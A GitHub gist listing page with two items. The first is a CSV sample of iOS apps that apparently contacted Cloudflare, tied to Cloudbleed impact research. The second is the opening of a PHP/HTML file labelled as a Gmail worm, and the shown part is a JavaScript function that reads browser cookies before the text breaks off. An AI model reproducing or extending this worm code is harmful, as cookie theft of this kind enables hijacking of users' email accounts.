Skip to content

Instantly share code, notes, and snippets.

@veritas06
veritas06 / ios_apps.csv
Created February 24, 2017 21:46 — forked from dweinstein/ios_apps.csv
Sample of popular apps observed (via dynamic analysis) to possibly use Cloudflare https://www.nowsecure.com/blog/2017/02/23/cloudflare-cloudbleed-bugs-impact-mobile-apps
application_id package_name title version_string domain
282935706 tv.lifechurch.bible Bible 7.2 cloudflare.com
284910350 com.yelp.yelpiphone Yelp 11.4.0 cloudflare.com
290853822 net.box.BoxNet Box for iPhone and iPad 4.0.1 cloudflare.com
300255638 com.abcnews.ABCNews ABC News – Watch Breaking US & World News, Live Video & Election Coverage 5.10.0 cloudflare.com
304154888 com.nicusa.FBIMostWanted Most Wanted 2.3 cloudflare.com
319881193 com.grindrguy.grindrx Grindr - Gay, bi, social networking and dating app to chat and meet guys 3.0.13 cloudflare.com
322439990 com.fboweb.MyRadar MyRadar NOAA Weather Radar – Forecasts, Storms, and Earthquakes 4.4.4 cloudflare.com
327630330 com.getdropbox.Dropbox Dropbox 28.2 cloudflare.com
329913454 com.crunchyroll.iphone Crunchyroll - Everything Anime 3.00.2 cloudflare.com
@veritas06
veritas06 / gmail-worm.php
Last active October 31, 2017 21:33 — forked from bevacqua/gmail-worm.php
[Gmail Worm] The worm that was gonig through Gmail accounts #PHP #Gmail #Google #worm
g.php:
<html>
<head>
<script type="text/javascript">
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;